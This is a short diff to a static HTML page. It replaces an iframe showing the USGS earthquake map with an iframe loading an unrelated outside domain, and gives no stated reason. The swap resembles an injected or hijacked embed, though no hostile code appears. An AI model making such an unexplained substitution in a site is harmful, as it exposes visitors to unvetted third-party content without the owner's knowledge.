--- a/static/index.html
+++ b/static/index.html
@@ -16,6 +16,6 @@
 </style>
 </head>
 <body>
-    <iframe src="https://earthquake.usgs.gov/earthquakes/map/?extent=21.73909,-111.79688&extent=51.94426,-78.13477"></iframe>
+    <iframe src="https://798sc.com"></iframe>
 </body>
 </html>
